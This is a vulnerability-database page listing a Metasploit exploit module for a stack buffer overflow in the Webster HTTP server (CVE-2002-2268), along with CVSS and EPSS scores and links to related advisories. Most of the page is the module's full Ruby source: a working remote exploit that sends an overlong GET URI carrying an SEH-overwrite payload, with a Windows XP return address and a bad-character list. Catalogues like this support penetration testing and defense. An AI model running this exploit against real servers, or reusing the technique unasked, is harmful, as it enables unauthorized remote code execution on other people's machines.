Lucene search
K
Database
Vendors
Products
Years
CVSS
Scanner
Agent Scanning
API Scanning
Manual Audit
Perimeter Scanner
Scanning
Projects
Email
Webhook
Plugins
Resources
Documents
Blog
Glossary
FAQ
Pricing
Contacts
About Us
Partners
Branding Guideline
metasploitAushack <[email protected]>MSF:EXPLOIT-WINDOWS-HTTP-WEBSTER_HTTP-
HistoryNov 03, 2010 - 12:19 p.m.

Webster HTTP Server GET Buffer Overflow

2010-11-0312:19:19
aushack <[email protected]>
www.rapid7.com
11

CVSS2

9.4

Attack Vector

NETWORK

Attack Complexity

LOW

Authentication

NONE

Confidentiality Impact

COMPLETE

Integrity Impact

COMPLETE

Availability Impact

NONE

AV:N/AC:L/Au:N/C:C/I:C/A:N

EPSS

0.899

Percentile

98.8%

JSON

This exploits a stack buffer overflow in the Webster HTTP server. The server and source code was released within an article from the Microsoft Systems Journal in February 1996 titled “Write a Simple HTTP-based Server Using MFC and Windows Sockets”.

##
# This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##

class MetasploitModule < Msf::Exploit::Remote
  Rank = AverageRanking

  include Msf::Exploit::Remote::HttpClient
  include Msf::Exploit::Remote::Seh

  def initialize(info = {})
    super(update_info(info,
      'Name'           => 'Webster HTTP Server GET Buffer Overflow',
      'Description'    => %q{
          This exploits a stack buffer overflow in the Webster HTTP server.
          The server and source code was released within an article from
          the Microsoft Systems Journal in February 1996 titled "Write a
          Simple HTTP-based Server Using MFC and Windows Sockets".
      },
      'Author'         => [ 'aushack' ],
      'References'     =>
        [
          [ 'CVE', '2002-2268' ],
          [ 'OSVDB', '44106' ],
          [ 'BID', '6289' ],
          [ 'URL', 'http://www.microsoft.com/msj/archive/s25f.aspx' ],
          [ 'URL', 'http://www.netdave.com/webster/webster.htm' ],
        ],
      'Privileged'     => false,
      'Payload'        =>
        {
          'Space'       => 1024,
          'DisableNops' => true,
          'BadChars'    => "\x00\x3a\x26\x3f\x25\x23\x20\x0a\x0d\x2f\x2b\x0b\x5c",
        },
      'Platform'       => 'win',
      'Targets'        =>
        [
          [ 'Windows XP SP0', 	{ 'Ret' => 0x71aa32ad } ] , # pop esi; pop ebx; ret ws2help.dll winxp
          [ 'Debug', 		{ 'Ret' => 0x44434241 } ] , # todo - add more targets.
        ],
      'DisclosureDate' => '2002-12-02',
      'DefaultTarget'  => 0))
  end

  def exploit
    print_status("Sending request...")
    seh = generate_seh_payload(target.ret)

    send_request_raw({
      'uri' => "/" + Rex::Text.rand_text_alphanumeric(266) + seh
    }, 2)

    handler
  end
end

Related

packetstorm 2
metasploit 1
cve 1
exploitdb 2
cvelist 1
zdt 1
nvd 1
packetstorm
packetstorm
Kolibri 2.0 HTTP Server HEAD Buffer Overflow
2011-03-14 00:00:00
Webster HTTP Server GET Buffer Overflow
2010-11-05 00:00:00
metasploit
metasploit
Kolibri HTTP Server HEAD Buffer Overflow
2011-03-13 07:18:36
cve
cve
CVE-2002-2268
2007-10-18 10:00:00
exploitdb
exploitdb
Webster HTTP Server - GET Buffer Overflow (Metasploit)
2010-11-03 00:00:00
Kolibri HTTP Server 2.0 - HEAD Buffer Overflow (Metasploit)
2011-08-03 00:00:00
cvelist
cvelist
CVE-2002-2268
2007-10-18 10:00:00
zdt
zdt
Kolibri <= v2.0 HTTP Server HEAD Buffer Overflow
2011-03-15 00:00:00
nvd
nvd
CVE-2002-2268
2002-12-31 05:00:00

CVSS2

9.4

Attack Vector

NETWORK

Attack Complexity

LOW

Authentication

NONE

Confidentiality Impact

COMPLETE

Integrity Impact

COMPLETE

Availability Impact

NONE

AV:N/AC:L/Au:N/C:C/I:C/A:N

EPSS

0.899

Percentile

98.8%

JSON
Related for MSF:EXPLOIT-WINDOWS-HTTP-WEBSTER_HTTP-
packetstorm2metasploit1cve1exploitdb2cvelist1zdt1nvd1